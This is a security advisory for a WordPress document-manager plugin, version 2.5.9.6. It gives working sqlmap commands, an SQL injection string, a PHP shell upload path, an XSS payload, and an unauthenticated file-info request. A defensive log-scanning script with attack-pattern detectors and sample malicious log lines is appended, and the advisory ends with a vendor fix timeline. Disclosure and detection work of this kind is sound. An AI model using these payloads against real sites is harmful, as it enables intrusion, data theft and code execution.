Multiple vulnerabilities in Wordpress plugin SP Projects & Document Manager

* Exploit Title: Multiple Vulnerabilities in SP Projects & Document Manager
* Discovery Date: 2016/01/13
* Public Disclosure Date: 2016/03/06
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x
* Vendor Homepage: http://smartypantsplugins.com/
* Software Link: https://de.wordpress.org/plugins/sp-client-document-manager/
* Version: 2.5.9.6
* Tested on: WordPress 4.4.1
* Category: webapps

Description
===============================================================================

The WordPress plugin "SP Projects & Document Manager" contains several 
vulnerabilities: arbitrary file upload and code execution by registered users, 
and SQL injections, information leakage and XSS reachable by unregistered users.

PoC
===============================================================================


1. SQL-Injections
~~~~~~~~~~~~~~~~~~~

Several SQL injections were known in version 2.4.1 and had been fixed in the meantime.
At least two of them reappeared in version 2.5.9.6:

- the injection in the "id" parameter on
http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=download-project&id=1

- and the injection in the POST parameter vendor_email on
http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=email-vendor

See https://packetstormsecurity.com/files/129212/WordPress-SP-Client-Document-Manager-2.4.1-SQL-Injection.html
for the original information on this.

Both injections can be exploited by sqlmap:

[1] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=download-project&id=1*" -p id --dbms mysql

[2] sqlmap -u "http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=email-vendor" --data="vendor_email[]=0) OR (1=1 *" --dbms mysql



2. Arbitrary code execution
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Clients can upload PHP files (*.php, *.php5 etc.) and execute them via a GET 
request to their location in the default upload path (which can vary 
depending on the configuration of the plugin). The URL of an uploaded file typically 
looks like

/wp-content/uploads/sp-client-document-manager/[UPLOADER-ID]/[FILE]

e.g.
http://wordpress.local.de/wp-content/uploads/sp-client-document-manager/1/shell.php

Files can be accessed directly even if the option "Require Login to Download" 
is checked in the plugin configuration.


3. Information leakage
~~~~~~~~~~~~~~~~~~~~~~~

Information about uploaded files can be retrieved by users who are not logged in 
via a call to admin/ajax.php:

-----------------------
GET http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=get-file-info&id=1

-- response --
200 OK
Date:  Wed, 13 Jan 2016 22:17:46 GMT
Server:  Apache/2.4.7 (Ubuntu)
X-Powered-By:  PHP/5.5.9-1ubuntu4.14
Expires:  Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control:  no-cache, must-revalidate
Pragma:  no-cache
Content-Length:  211
Connection:  close
Content-Type:  application/json

{"id":"1","name":"in.php","file":"index.php","notes":"","tags":"","uid":"1","cid":"0","pid":"0","parent":"0","date":"2016-01-13 15:18:27","status":"0","form_id":"0","entry_id":"0","group_id":"0","client_id":"0"}
---------------

Specifically, the uploader's user ID ("uid") and the stored filename ("file") can be 
retrieved and combined into the URL for direct access to the file (see 2).

4. XSS Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~

There is a (non-persistent) XSS vulnerability in the admin/ajax.php file 
for function=email-vendor:

---------------
POST http://wordpress.local.de/wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=email-vendor
Content-Type: application/x-www-form-urlencoded
vendor_email[]=1&vendor=<script>alert(1);</script>

-- response --
200 OK
Date:  Sun, 06 Mar 2016 10:00:30 GMT
Server:  Apache/2.4.7 (Ubuntu)
X-Powered-By:  PHP/5.5.9-1ubuntu4.14
Expires:  Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control:  no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma:  no-cache
Vary:  Accept-Encoding
Content-Encoding:  gzip
Content-Length:  101
Keep-Alive:  timeout=5, max=100
Connection:  Keep-Alive
Content-Type:  text/html

<p style="color:green;font-weight:bold">Dateien gesendet an <script>alert(1);</script></p>
---------------
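From the defender's side, the four issues above leave distinct traces in the web server's access log. The following scanner is an added example, not part of the advisory or of the plugin: it tags combined-format log lines that fetch a PHP file from the plugin's upload tree (2), call get-file-info (3), pass a non-numeric "id" to download-project (1), or POST to email-vendor (1 and 4, whose injectable fields sit in the request body that access logs do not record). The paths come from the advisory; the sample log lines and IP addresses are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Endpoints named in the advisory (host-independent paths).
PLUGIN_AJAX = "/wp-content/plugins/sp-client-document-manager/admin/ajax.php"
UPLOAD_DIR = "/wp-content/uploads/sp-client-document-manager/"
# Combined log format: ip ident user [time] "METHOD target proto" status bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# Extensions a PHP handler typically executes (php, php5, phtml, ...).
PHP_EXT_RE = re.compile(r"\.ph(p\d?|tml)$", re.IGNORECASE)

def classify(line):
    """Return (client_ip, [tags]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m.group("target"))
    path = unquote(url.path)
    params = parse_qs(url.query)  # parse_qs percent-decodes the values itself
    tags = []
    # Section 2: a PHP file fetched from the plugin's upload tree.
    if path.startswith(UPLOAD_DIR) and PHP_EXT_RE.search(path):
        tags.append("php-in-uploads")
    if path == PLUGIN_AJAX:
        func = params.get("function", [""])[0]
        ident = params.get("id", [""])[0]
        if func == "get-file-info":          # section 3: reachable without login
            tags.append("file-info-lookup")
        if func == "download-project" and not ident.isdigit():  # section 1
            tags.append("sqli-id")
        # Sections 1 and 4: the injectable fields travel in the POST body, which
        # access logs omit, so flag the endpoint for body-level (WAF/app log) review.
        if func == "email-vendor" and m.group("method") == "POST":
            tags.append("email-vendor-post")
    return m.group("ip"), tags

def scan(lines):
    """Return [(ip, tags)] for every parseable line that raised at least one tag."""
    return [hit for hit in map(classify, lines) if hit and hit[1]]

# Constructed sample log (RFC 5737 addresses); not taken from the advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Jan/2016:22:17:46 +0000] "GET /wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=get-file-info&id=1 HTTP/1.1" 200 211
203.0.113.7 - - [13/Jan/2016:22:18:02 +0000] "GET /wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=download-project&id=1%20OR%201%3D1 HTTP/1.1" 200 523
203.0.113.7 - - [13/Jan/2016:22:18:30 +0000] "GET /wp-content/uploads/sp-client-document-manager/1/shell.php HTTP/1.1" 200 87
198.51.100.4 - - [13/Jan/2016:22:19:01 +0000] "GET /wp-content/uploads/sp-client-document-manager/2/report.pdf HTTP/1.1" 200 90122
203.0.113.7 - - [13/Jan/2016:22:19:40 +0000] "POST /wp-content/plugins/sp-client-document-manager/admin/ajax.php?function=email-vendor HTTP/1.1" 200 101
"""
```

Run `scan(SAMPLE_LOG.splitlines())` to see the four tagged requests; the benign PDF download produces no tag.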


Timeline
===============================================================================

2016/01/13 - Issues discovered
2016/01/14 - Issues reported to vendor via contact form on his website
2016/01/27 - No response from vendor; WordPress security team notified
2016/01/29 - Reply from Wordpress security team
2016/03/02 - Vendor released security update 2.6.0.0 - issues fixed


Solution
===============================================================================
  
Update to the latest version (2.6.0.0 or later).



